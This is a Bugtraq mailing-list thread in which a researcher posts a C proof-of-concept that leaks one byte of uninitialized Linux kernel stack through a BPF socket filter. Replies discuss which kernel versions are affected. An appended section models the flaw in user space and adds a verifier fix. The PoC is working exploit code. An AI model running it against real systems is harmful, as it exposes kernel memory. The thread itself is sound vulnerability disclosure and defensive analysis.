Re: Kernel 0-day

Board: Bugtraq | Posted: 2010/11/20 02:01 | Thread: 4/4 | Comments: 0
Felipe,

The bug goes back all the way to 2.4.0. But please keep in mind that this exploit was intended as a joke - it only allows you to read a single byte of uninitialized kernel stack memory, out of a 64-byte buffer. In addition, you're not even guaranteed to be reading contiguous data if you request sequential bytes. Even considering the fact that on x86, the memory will be read from the soft IRQ stack instead of the current process kernel stack, I seriously doubt that you could get anything useful out of a single byte that probably just contains garbage from previous functions in the call path.

I've gotten reports that this code happens to occasionally trigger a strange locking bug in the networking stack, which is just a funny accident.

-Dan

On Wed, Nov 17, 2010 at 8:41 PM, Felipe Martins <martins.felipe.security@gmail.com> wrote:
> Dan,
>
>     What kernel versions are vulnerable to this one?
>
> Felipe
>
> On 10/11/2010 17:05, James Lay wrote:
>>
>> What kernel version(s) is/are impacted?  Tried on one and no workie.
>>
>> James
>>
>>
>> On 11/9/10 3:18 PM, "Dan Rosenberg" <dan.j.rosenberg@gmail.com> wrote:
>>
>>> Enjoy...
>>>
>>> -Dan
>>>
>>>
>>> /*
>>>  * You've done it.  After hours of gdb and caffeine, you've finally got a shell
>>>  * on your target's server.  Maybe next time they will think twice about
>>>  * running MyFirstCompSciProjectFTPD on a production machine.  As you take
>>>  * another sip of Mountain Dew and pick some of the cheetos out of your beard,
>>>  * you begin to plan your next move - it's time to tackle the kernel.
>>>  *
>>>  * What should be your goal?  Privilege escalation?  That's impossible, there's
>>>  * no such thing as a privilege escalation vulnerability on Linux.  Denial of
>>>  * service?  What are you, some kind of script kiddie?  No, the answer is
>>>  * obvious.  You must read the uninitialized bytes of the kernel stack, since
>>>  * these bytes contain all the secrets of the universe and the meaning of life.
>>>  *
>>>  * How can you accomplish this insidious feat?  You immediately discard the
>>>  * notion of looking for uninitialized struct members that are copied back to
>>>  * userspace, since you clearly need something far more elite.  In order to
>>>  * prove your superiority, your exploit must be as sophisticated as your taste
>>>  * in obscure electronic music.  After scanning the kernel source for good
>>>  * candidates, you find your target and begin to code...
>>>  *
>>>  * by Dan Rosenberg
>>>  *
>>>  * Greets to kees, taviso, jono, spender, hawkes, and bla
>>>  *
>>>  */
>>>
>>> #include <string.h>
>>> #include <stdio.h>
>>> #include <netinet/in.h>
>>> #include <arpa/inet.h>
>>> #include <sys/socket.h>
>>> #include <unistd.h>
>>> #include <stdlib.h>
>>> #include <linux/filter.h>
>>>
>>> #define PORT 37337
>>>
>>> /* The child sends a 512-byte datagram to the local port; the parent
>>>  * receives it through the filtered socket, and recvfrom() returns the
>>>  * length the filter let through. */
>>> int transfer(int sendsock, int recvsock)
>>> {
>>>
>>>     struct sockaddr_in addr;
>>>     char buf[512];
>>>     socklen_t len = sizeof(addr);
>>>
>>>     memset(buf, 0, sizeof(buf));
>>>
>>>     if (fork())
>>>         return recvfrom(recvsock, buf, 512, 0, (struct sockaddr *)&addr, &len);
>>>
>>>     sleep(1);
>>>
>>>     memset(&addr, 0, sizeof(addr));
>>>     addr.sin_family = AF_INET;
>>>     addr.sin_port = htons(PORT);
>>>     addr.sin_addr.s_addr = inet_addr("127.0.0.1");
>>>
>>>     sendto(sendsock, buf, 512, 0, (struct sockaddr *)&addr, len);
>>>
>>>     exit(0);
>>>
>>> }
>>>
>>> int main(int argc, char * argv[])
>>> {
>>>
>>>     int sendsock, recvsock, ret;
>>>     unsigned int val;
>>>     struct sockaddr_in addr;
>>>     struct sock_fprog fprog;
>>>     struct sock_filter filters[5];
>>>
>>>     if (argc != 2) {
>>>         printf("[*] Usage: %s offset (0-63)\n", argv[0]);
>>>         return -1;
>>>     }
>>>
>>>     val = atoi(argv[1]);
>>>
>>>     if (val > 63) {
>>>         printf("[*] Invalid byte offset (must be 0-63)\n");
>>>         return -1;
>>>     }
>>>
>>>     recvsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
>>>     sendsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
>>>
>>>     if (recvsock < 0 || sendsock < 0) {
>>>         printf("[*] Could not create sockets.\n");
>>>         return -1;
>>>     }
>>>
>>>     memset(&addr, 0, sizeof(addr));
>>>     addr.sin_family = AF_INET;
>>>     addr.sin_port = htons(PORT);
>>>     addr.sin_addr.s_addr = htonl(INADDR_ANY);
>>>
>>>     if (bind(recvsock, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
>>>         printf("[*] Could not bind socket.\n");
>>>         return -1;
>>>     }
>>>
>>>     memset(&fprog, 0, sizeof(fprog));
>>>     memset(filters, 0, sizeof(filters));
>>>
>>>     /* Load scratch word (val / 4) into A, isolate byte (val % 4) of it,
>>>      * add 256 and return that as the accept length.  The scratch word is
>>>      * never stored to, so it holds whatever the kernel stack had before. */
>>>     filters[0].code = BPF_LD|BPF_MEM;
>>>     filters[0].k = (val & ~0x3) / 4;
>>>
>>>     filters[1].code = BPF_ALU|BPF_AND|BPF_K;
>>>     filters[1].k = 0xff << ((val % 4) * 8);
>>>
>>>     filters[2].code = BPF_ALU|BPF_RSH|BPF_K;
>>>     filters[2].k = (val % 4) * 8;
>>>
>>>     filters[3].code = BPF_ALU|BPF_ADD|BPF_K;
>>>     filters[3].k = 256;
>>>
>>>     filters[4].code = BPF_RET|BPF_A;
>>>
>>>     fprog.len = 5;
>>>     fprog.filter = filters;
>>>
>>>     if (setsockopt(recvsock, SOL_SOCKET, SO_ATTACH_FILTER, &fprog, sizeof(fprog)) < 0) {
>>>         printf("[*] Failed to install filter.\n");
>>>         return -1;
>>>     }
>>>
>>>     ret = transfer(sendsock, recvsock);
>>>
>>>     printf("[*] Your byte: 0x%.02x\n", ret - 248);
>>>
>>>     return 0;
>>>
>>> }
>>>
>>
>
> --
> Felipe Martins
> Security Analyst
> E-mail: martins.felipe.security@gmail.com
> Skype: martins.felipe
>
>
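Added example, not part of the thread and not Dan's code: a user-space model of the classic BPF path the PoC exercises, plus the check a filter verifier can apply to close it. The interpreter runs a straight-line filter over a caller-supplied scratch area, so you can see what the five-instruction program computes when that area holds stale content; the verifier rejects any BPF_LD|BPF_MEM from a scratch slot no earlier BPF_ST wrote, which is exactly what makes the PoC's load observable. The opcode values mirror linux/filter.h but are defined locally so the file builds on any platform; STALE is constructed sample content standing in for stale kernel stack (not real leaked data), and run_filter, check_filter, build_leak_filter and the demo_* helpers are names chosen here. Jumps are not modelled, which is enough for this filter.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Classic BPF opcode fields; same numeric values as linux/filter.h, defined
 * here so the model builds anywhere. 16 scratch words = the 64-byte buffer. */
enum { BPF_LD = 0x00, BPF_ST = 0x02, BPF_ALU = 0x04, BPF_RET = 0x06, BPF_MEM = 0x60,
       BPF_ADD = 0x00, BPF_AND = 0x50, BPF_RSH = 0x70, BPF_K = 0x00, BPF_A = 0x10,
       BPF_MEMWORDS = 16 };

struct insn { uint16_t code; uint8_t jt, jf; uint32_t k; };

/* Interpret a straight-line filter over the scratch area mem[]. Returns 1 and
 * stores the accept length in *ret on BPF_RET; 0 on an unsupported opcode or
 * an out-of-range slot. */
int run_filter(const struct insn *prog, int len, uint32_t mem[BPF_MEMWORDS], uint32_t *ret)
{
    uint32_t A = 0;
    for (int pc = 0; pc < len; pc++) {
        const struct insn *in = &prog[pc];
        switch (in->code) {
        case BPF_LD | BPF_MEM:                 /* A = mem[k], whatever mem[k] holds */
            if (in->k >= BPF_MEMWORDS) return 0;
            A = mem[in->k]; break;
        case BPF_ST:                           /* mem[k] = A */
            if (in->k >= BPF_MEMWORDS) return 0;
            mem[in->k] = A; break;
        case BPF_ALU | BPF_AND | BPF_K: A &= in->k; break;
        case BPF_ALU | BPF_RSH | BPF_K: A >>= in->k; break;
        case BPF_ALU | BPF_ADD | BPF_K: A += in->k; break;
        case BPF_RET | BPF_A: *ret = A; return 1;
        default: return 0;
        }
    }
    return 0;
}

/* Verifier check: every BPF_LD|BPF_MEM must read a slot that an earlier
 * BPF_ST wrote, so whatever the scratch area held before is never observable. */
int check_filter(const struct insn *prog, int len)
{
    uint32_t written = 0;                      /* bit i set once slot i is stored */
    for (int pc = 0; pc < len; pc++) {
        const struct insn *in = &prog[pc];
        if (in->code == BPF_ST) {
            if (in->k >= BPF_MEMWORDS) return 0;
            written |= 1u << in->k;
        } else if (in->code == (BPF_LD | BPF_MEM)) {
            if (in->k >= BPF_MEMWORDS || !(written & (1u << in->k))) return 0;
        }
    }
    return 1;
}

/* The five-instruction program from the PoC, for byte offset val (0-63). */
int build_leak_filter(unsigned val, struct insn prog[5])
{
    if (val > 63) return 0;
    memset(prog, 0, 5 * sizeof(*prog));
    prog[0].code = BPF_LD | BPF_MEM;          prog[0].k = (val & ~0x3u) / 4;
    prog[1].code = BPF_ALU | BPF_AND | BPF_K; prog[1].k = 0xffu << ((val % 4) * 8);
    prog[2].code = BPF_ALU | BPF_RSH | BPF_K; prog[2].k = (val % 4) * 8;
    prog[3].code = BPF_ALU | BPF_ADD | BPF_K; prog[3].k = 256;
    prog[4].code = BPF_RET | BPF_A;
    return 1;
}

/* Constructed stale scratch contents standing in for whatever the kernel stack
 * held before the filter ran; not real leaked data. */
static const uint32_t STALE[BPF_MEMWORDS] = { 0x44332211u, 0xdeadbeefu };

/* Run the leak filter over STALE and recover the byte the way the PoC does:
 * accept length minus the 256 the filter added. Returns -1 on error. */
int demo_leak(unsigned val)
{
    struct insn prog[5];
    uint32_t mem[BPF_MEMWORDS], ret;
    if (!build_leak_filter(val, prog)) return -1;
    memcpy(mem, STALE, sizeof(mem));
    if (!run_filter(prog, 5, mem, &ret)) return -1;
    return (int)(ret - 256);
}

/* 1 if the verifier accepts the leak filter for offset val, 0 if it rejects it. */
int demo_check_leak(unsigned val)
{
    struct insn prog[5];
    if (!build_leak_filter(val, prog)) return -1;
    return check_filter(prog, 5);
}

/* A program that stores to slot 3 before loading it passes the same check. */
int demo_check_safe(void)
{
    struct insn prog[3] = { { BPF_ST, 0, 0, 3 }, { BPF_LD | BPF_MEM, 0, 0, 3 },
                            { BPF_RET | BPF_A, 0, 0, 0 } };
    return check_filter(prog, 3);
}

int main(void)
{
    for (unsigned v = 0; v < 8; v++)
        printf("offset %u: byte 0x%02x\n", v, demo_leak(v));
    printf("verifier accepts leak filter: %d, safe filter: %d\n",
           demo_check_leak(0), demo_check_safe());
    return 0;
}
```

In the model the byte comes back as the accept length minus 256, while the PoC subtracts 248: the kernel applies the filter's return value as a length to the datagram including its 8-byte UDP header, and recvfrom() then hands back only the payload, so the two differ by exactly those 8 bytes. The verifier check is the same idea a kernel-side sanity pass uses: since a slot that was never stored to can only contain stale data, refusing to load it removes the leak without changing what any well-formed filter computes.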
Article ID (AID): #1CvhjXzs (Bugtraq)